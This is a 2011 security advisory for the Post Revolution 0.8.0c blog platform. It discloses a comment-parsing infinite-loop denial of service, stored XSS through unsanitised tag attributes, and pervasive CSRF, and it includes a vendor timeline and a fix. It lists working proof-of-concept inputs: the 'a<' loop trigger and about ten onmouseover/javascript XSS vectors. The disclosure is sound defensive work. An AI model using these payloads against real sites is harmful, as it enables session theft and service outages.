Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

2011-06-01T00:00:00
ID PACKETSTORM:101893
Type packetstorm
Reporter Javier Bassi
Modified 2011-06-01T00:00:00

Description

                                        
                                            `info  
———————————  
Name : Post Revolution 0.8.0c Multiple Remote Vulnerabilities  
Class: Design Error && Input Validation Error  
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954  
Remote: Yes  
Local: No  
Credit : Javier Bassi <javierbassi [at] gmail [dot] com>  
Vulnerable : All versions prior to and including 0.8.0c are affected.  
Vendor Hompeage : http://postrev.com.ar  
  
  
  
description  
———————————  
Post Revolution is an open source blog tool and publishing platform  
powered by PHP and MySQL.  
  
  
  
discussion  
———————————  
Post Revolution is prone to multiple remote vulnerabilities, including:  
1. A Denial of service vulnerability. (CWE-835) (CVE-2011-1952)  
2. Persistent Cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)  
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)  
  
An attacker may leverage these issues to cause a denial-of-service  
condition, perform certain administrative actions, execute arbitrary  
script code in the browser of an unsuspecting user in the context of  
the website, steal cookie-based authentication credentials, and gain  
unauthorized access to the affected application.  
Post Revolution 0.8.0c is vulnerable.  
  
  
  
timeline  
———————————  
2011.05.22 – Informed developers  
2011.05.23 – Patch for issues 1 & 2 released.  
2011.06.01 – Disclosed  
  
  
  
details/pocs  
———————————  
1. Denial of Service vulnerability  
Post Revolution allows some HTML tags in the comments and removes all  
non-permitted.  
The vulnerable code is in the lines 456 to 462 in common.php:  
  
while(stripos($s,'<') > 0){  
$pos[1] = stripos($s,'<');  
$pos[2] = stripos($s,'>', $pos[1]);  
$len[1] = $pos[2] - $pos[1] + 1;  
$x = substr($s,$pos[1],$len[1]);  
$s = str_replace($x,'',$s);  
}  
  
This code tries to remove every non-permitted HTML tag. $s is the  
content of the comment. An attacker could post a comment with just  
'a<' and then while(stripos($s,'<') > 0) will always be true because  
pos[1]=1, pos[2] will be NULL, len[1]=0, then x = NULL so $s will be  
again 'a<'.  
This will cause an infinite loop that will end when php kills the  
script printing:  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/var/www/postrev/common.php on line 459  
  
  
2. Cross-site scripting vulnerabilities.  
Post Revolution allows the following tags in the comments:  
p,strong,a,em,i,img,li,ol,video,blockquote  
and don't sanitize their attributes.  
So the following XSS vectors work:  
<a href="javascript:alert(1)">some text</a>  
<p onmouseover="javascript:alert(1)">some text</p>  
<a href="" onmouseover="javascript:alert(1);">some text</a>  
<em onmouseover="javascript:alert(1)">some text</em>  
<strong onmouseover="javascript:alert(1)">some text</strong>  
<i onmouseover="javascript:alert(1)">some text</i>  
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"  
onmouseover="javascript:alert(1)" />  
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>  
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>  
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>  
  
The same with other events like onclick, onmouseout, onmousemove, onkeydown, etc  
Also note that the PR doesn't close the tag for you, so its not  
necesary to get the comment mouseovered by the admin. If the attacker  
post <p onmouseover="javascript:alert(1)">some text  
mouseover event will be triggered when the admin moves the mouse  
anywhere below attacker's comment.  
  
  
3. Cross-site request forgery vulnerabitiles.  
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,  
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection  
against CSRF in any form except for anonymous comments and  
registration that has a captcha.  
  
  
  
solution  
———————————  
You can fix DoS and XSS vulns fast by replacing the whole function  
check_html in common.php from line 416 to 471 with  
function check_html($s){  
return htmlspecialchars($s);  
}  
  
Users will not be able to format their comments with HTML but Post  
Revolution already has BBcode so there was no need of HTML in comments  
in the first place.  
NO HTML FOR YOU!  
  
Fix the CSRFs will require some coding.  
Vendor has released a patch for issues 1 and 2:  
postrev.com.ar  
  
  
  
References  
——————-  
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/  
`